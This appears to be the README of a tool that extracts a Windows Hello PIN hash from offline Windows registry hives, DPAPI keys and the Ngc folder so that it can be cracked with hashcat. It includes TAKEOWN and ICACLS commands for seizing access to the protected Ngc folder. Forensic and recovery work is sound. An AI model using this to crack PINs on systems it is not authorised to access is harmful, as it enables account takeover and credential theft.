WINHELLO2hashcat

About

With this tool one can extract the "hash" from a WINDOWS HELLO PIN. This hash can be cracked with Hashcat, more precisely with the plugin -m 28100.

This tool is extensivly tested with: - WIN_10 21H1 and 21H2 - WIN_11.

Please read this post for more information: https://hashcat.net/forum/thread-10461.html

Requirements

The Python-package dpapick3 is needed.

Usage

``` λ python WINHELLO2hashcat.py --help usage: WINHELLO2hashcat.py [--verbose] --cryptokeys --masterkey --system --security [--pinguid |--ngc ] [--software ]

optional arguments: -h, --help show this help message and exit --verbose Verbose mode --cryptokeys CRYPTOKEYS The "\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Crypto\Keys" directory --masterkey MASTERKEY The "\Windows\System32\Microsoft\Protect\S-1-5-18\User" directory --system SYSTEM The "\Windows\System32\config\SYSTEM" hive" --security SECURITY The "\Windows\System32\config\SECURITY" hive" --pinguid PINGUID The PIN guid --ngc NGC The "\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Ngc" directory --software SOFTWARE The "\Windows\System32\config\SOFTWARE" hive" --windows PATH The windows offline directory. It will autodetect the system, security, masterkey, cryptokeys, ngc and software arguments ``` - CRYPTOKEYS-folder, MASTERKEY-folder, SYSTEM and SECURITY hives are mandatory - NGC-folder or PIN_GUID is mandatory. - SOFTWARE hive is optional; only needed to print the username

Remarks

• On systems with a TPM (hardware or firmware versions), this script will not work because the needed keys are protected.
• When working with a mounted or live image, this script needs to be executed as an admin and the NGC-folder requires SYSTEM-privilege.
• Use these two commands first in order to the script can correctly acces the NGC-folder:

  TAKEOWN /f %windir%\ServiceProfiles\LocalService\AppData\Local\Microsoft\Ngc /r /D Y

ICACLS %windir%\ServiceProfiles\LocalService\AppData\Local\Microsoft\Ngc /grant "%username%":(F) /t - Screenshot of login screen where PIN is asked. Notice that Windows does an auto-enter after the correct number of digits is entered.

- Screenshot of login where PIN is asked, but this time there is a letter/symbol added. Notice that there is **no auto-enter** anymore, but an arrow is added to the field.

- This script is provided as-is. Please report any issues. - Happy cracking!